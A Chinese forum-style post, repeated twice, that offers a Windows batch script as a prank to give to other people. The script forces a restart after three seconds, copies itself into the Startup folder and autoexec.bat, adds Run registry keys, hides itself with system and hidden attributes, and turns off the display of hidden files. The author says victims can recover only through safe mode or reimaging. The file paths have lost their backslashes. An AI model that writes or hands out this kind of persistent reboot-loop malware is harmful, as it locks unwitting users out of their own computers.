我来发几个小东西`````无聊的时候大家给别人玩玩 嘿嘿 玩出事了可别找我
反复重启的批处理 顾名思义 就是让别人启动了再重启 一直反复....废话不多说 看底下的代码
@echo off
shutdown -r -t 3
copy %0 C:Documents" "and" "SettingsAll" "Users「开始」菜单程序启动a.bat
copy %0 c:autoexec.bat
REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v autoexec.bat /t REG_SZ /d c:autoexec.bat /f
REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v autoexec.bat /t REG_SZ /d c:autoexec.bat /f
attrib autoexec.bat +r +s +h
REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
del %0
3秒重启 加入了启动项 开机就会3秒倒计时 嘿嘿 要想不重启了 就到安全模式下或者ghost搞定吧 我可没其他办法
反复重启的批处理 顾名思义 就是让别人启动了再重启 一直反复....废话不多说 看底下的代码
@echo off
shutdown -r -t 3
copy %0 C:Documents" "and" "SettingsAll" "Users「开始」菜单程序启动a.bat
copy %0 c:autoexec.bat
REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v autoexec.bat /t REG_SZ /d c:autoexec.bat /f
REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v autoexec.bat /t REG_SZ /d c:autoexec.bat /f
attrib autoexec.bat +r +s +h
REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
del %0
3秒重启 加入了启动项 开机就会3秒倒计时 嘿嘿 要想不重启了 就到安全模式下或者ghost搞定吧 我可没其他办法









